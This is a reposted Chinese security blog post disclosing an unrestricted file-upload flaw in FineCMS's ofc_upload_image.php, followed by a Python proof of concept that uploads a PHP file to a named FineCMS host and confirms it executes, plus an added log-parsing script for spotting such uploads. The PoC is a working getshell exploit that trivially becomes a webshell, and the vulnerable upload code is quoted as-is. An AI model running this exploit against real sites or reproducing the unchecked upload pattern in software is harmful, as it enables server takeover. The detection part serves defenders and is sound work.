FineCMS Free Edition: Unconditional Getshell

没穿底裤 2020-01-01 06:03:04

Path: dayrui/libraries/Chart/ofc_upload_image.php

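```php
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// The file name comes straight from the query string; basename() only strips
// directory components, the extension is not checked.
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;

// The raw request body is written to disk as-is, with no content check.
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);
```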

The script applies no restrictions at all, so a file can be uploaded directly.

PoC:

```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#__author__ = '1c3z'

import urllib2
import random

fileName = "shell" + str(random.randrange(1000,9999)) + ".php"
target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php"

def uploadShell():
    url = target + "?name=" + fileName
    req = urllib2.Request(url, headers={"Content-Type": "application/oct"})
    res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")
    return res.read()

def poc():
    res = uploadShell()
    if res.find("tmp-upload-images") == -1:
        print "Failed !"
        return

    print "upload Shell success"
    url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName
    md5 = urllib2.urlopen(url).read()
    if md5.find("e369853df766fa44e1ed0ff613f563bd") != -1:
        print "poc: " + url

poc()
```
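As an added example (not part of the original post or of FineCMS), the request pattern above can be hunted for in web server access logs: a request to ofc_upload_image.php whose name parameter ends in a script extension, followed by a successful request for that file under tmp-upload-images/. The log lines, the extension list and the function name `find_upload_abuse` are assumptions constructed for illustration.

```python
import re
from posixpath import basename
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2020:06:01:10 +0800] "POST /dayrui/libraries/Chart/ofc_upload_image.php?name=chart1.png HTTP/1.1" 200 52
203.0.113.9 - - [01/Jan/2020:06:02:31 +0800] "POST /dayrui/libraries/Chart/ofc_upload_image.php?name=shell1234.php HTTP/1.1" 200 61
203.0.113.9 - - [01/Jan/2020:06:02:33 +0800] "GET /dayrui/libraries/tmp-upload-images/shell1234.php HTTP/1.1" 200 32
198.51.100.4 - - [01/Jan/2020:06:03:00 +0800] "GET /index.php HTTP/1.1" 200 5120
"""

# client, request target, status; the HTTP method is ignored because the
# handler shown above never checks it.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
UPLOAD_SCRIPT = "/Chart/ofc_upload_image.php"
UPLOAD_DIR = "/tmp-upload-images/"
# Assumption: extensions the web server may hand to an interpreter; adjust per deployment.
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)$", re.I)

def find_upload_abuse(log_text):
    """Map each script-named upload to its uploader and to clients that later fetched it."""
    findings = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if url.path.endswith(UPLOAD_SCRIPT):
            # Mirror the handler: it keeps only basename() of the name parameter.
            for name in parse_qs(url.query).get("name", []):
                name = basename(name)
                if SCRIPT_EXT.search(name):
                    findings[name] = {"uploader": client, "fetched_by": []}
        elif UPLOAD_DIR in url.path and status == "200":
            # A 200 on a previously uploaded script name means the file is reachable.
            name = basename(url.path)
            if name in findings:
                findings[name]["fetched_by"].append(client)
    return findings

if __name__ == "__main__":
    for name, info in find_upload_abuse(SAMPLE_LOG).items():
        print(name, info)
```

Any hit with a non-empty `fetched_by` list means the uploaded file was served back, so the matching file under tmp-upload-images/ should be reviewed on disk.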

没穿底裤
  • Published on 2020-01-01 06:03:04
  • When reposting, please keep the link to this article (CN-SEC中文网, with thanks to the original author for their hard work): http://cn-sec.com/archives/76513.html